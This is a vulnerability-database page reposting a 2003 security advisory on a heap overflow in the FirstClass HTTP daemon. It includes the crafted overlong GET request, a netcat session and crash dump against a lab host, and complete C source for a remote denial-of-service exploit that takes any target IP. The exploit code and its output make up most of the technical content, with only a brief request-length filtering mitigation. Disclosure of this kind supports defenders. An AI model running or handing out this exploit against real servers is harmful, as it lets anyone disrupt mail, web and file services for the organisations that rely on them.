Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

I2S-LAB-25-09-2003.txt

🗓️ 06 Oct 2003 00:00:00Reported by Fred ChaverotType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Remote DoS vulnerability in FirstClass HTTP daemon affects multiple services via heap overflow.

Code
`###########################################################################################  
  
~ I2S LAB Security Advisory ~  
  
###########################################################################################  
http://www.I2S-LAB.com  
  
  
Date : 25/09/2003  
  
Affected systems : FirstClass build 133 (SP3) and previous versions HTTP Daemon  
  
Vendor : http://www.centrinity.com  
  
Issue : Attackers can remotely shutdown internet services (HTTP/FTP/SMTP/POP3/IMAP4/...)  
  
  
Description  
___________  
  
FirstClass is a combination of solutions that allows a company to set up a reliable intranet   
by integrating powerful internet services and including most common communication protocols   
(SMTP/ HTTP/ FTP/ ...)  
  
  
Technical Details  
_________________  
  
FirstClass's "Internet Services" plug-in has a remote DoS vulnerability in the HTTP daemon, which could be caused   
by a Heap Overflow overwriting a data pointer.  
  
By sending a request on port 80 like: GET / HTTP/1.1[A x 246]  
  
FirstCLass Internet Services will cause an access violation error by trying to read somewhere in the  
heap some data located outside of the adressing space allocated by the process.  
  
  
D:\netcat>nc -vv 10.0.0.5 80  
I2S-w2k [10.0.0.5] 80 (http) open  
GET / HTTP/1.1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
AAAAAAAAAAAAAAAADDDD  
  
sent 262, rcvd 0: NOTSOCK  
  
D:\netcat>  
  
*** Exception in program C:\FCServer\fcintsrv.exe  
Location: CList::GetNext+0000003C (004F882C)  
Error: Access violation  
Cause: Read attempted at <Unknown> (4444444C)  
  
Registers:  
EAX=01F2415C EBX=00C802F0 ECX=44444444 <-- pointer is overwritten here  
EDX=01F2415C ESI=00000000 EDI=00000000  
EIP=004F882C ESP=0205F86C EBP=0205F870 Flags=00000206  
  
CS=0000001B DS=00000023 SS=00000023  
ES=00000023 FS=00000038 GS=00000000  
  
  
:004F881D 8B55FC mov edx, dword ptr [ebp-04]  
:004F8820 837A0400 cmp dword ptr [edx+04], 00000000  
:004F8824 740B je 004F8831  
:004F8826 8B45FC mov eax, dword ptr [ebp-04]  
:004F8829 8B4804 mov ecx, dword ptr [eax+04]  
:004F882C 8B4108 mov eax, dword ptr [ecx+08] <-- crash occurs  
:004F882F EB02 jmp 004F8833  
  
  
Exploit  
_______  
  
  
/*******************************************  
* FirstClass Internet Services Remote DoS *  
*******************************************  
  
discovered & coded by I2S-LAB  
  
--------------------------------------------  
  
This exploit uses a ptr overflow to remotely   
shutdown the Internet Services of FirstClass.  
  
  
CONTACT  
_______  
  
Fred CHAVEROT : fred[at]I2S-LAB.com  
Aurélien BOUDOUX : aurelien[at]I2S-LAB.com  
  
  
URL : http://www.I2S-LaB.com  
  
*******************************************/  
  
  
#include <windows.h>  
#include <winsock.h>  
#pragma comment (lib,"wsock32.lib")  
  
#define PerfectOverwrite 246  
  
void main (int argc, char *argv[])  
{  
  
int len;  
SOCKET sock1;  
SOCKADDR_IN sin;  
char *sav;  
  
WSADATA wsadata;  
WORD wVersionRequested = MAKEWORD (2,0);  
  
printf ("- FirsClass Internet Services Remote DoS -\n\n"  
"Discovered & coded by I2S-LAB\n"  
"http://www.I2S-LaB.com\n\n");  
  
  
if (!argv[1])  
{  
printf ("Usage : %s <IP Address>\n", argv[0]);  
ExitProcess (0);  
}  
  
if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);  
  
if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )  
{  
printf ("Error ! cannot allocate enough memory.\n");  
ExitProcess (0);   
};  
  
lstrcat (sav, "GET / HTTP/1.1");  
memset (&sav[14], 'A', PerfectOverwrite - 4);  
lstrcat (sav,"DDDD\r\n\r\n");  
  
sin.sin_family = AF_INET;  
sin.sin_port = htons (80);  
  
if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)  
{  
printf ("Incorrect IP Address : %s\n", argv[1]);  
ExitProcess(0);  
}  
  
sock1 = socket (AF_INET, SOCK_STREAM, 0);  
  
printf ("\nconnecting to %s...", argv[1]);  
  
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )  
printf ("connection failed!\n");  
  
else  
{  
printf ("ok!\nSending crafted request...");  
  
send (sock1,sav, PerfectOverwrite + 18,0);  
puts ("ok!");  
}   
  
closesocket (sock1);  
}  
  
  
Solution  
________  
  
CENTRINITY Corp. has been warned and is currently working to fix the problem.  
  
Until further notice, we advise you to use a filter to restrain the length of HTTP request sent to server.  
  
  
Credits  
_______  
  
  
Aurélien BOUDOUX - aurelien[at]I2S-LaB.com  
Fred CHAVEROT - fred[at]I2S-LaB.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Oct 2003 00:00Current
7.4High risk
Vulners AI Score7.4
remote denial of servicefirstclass vulnerabilityhttp daemonheap overflowservice disruptioninternet services
25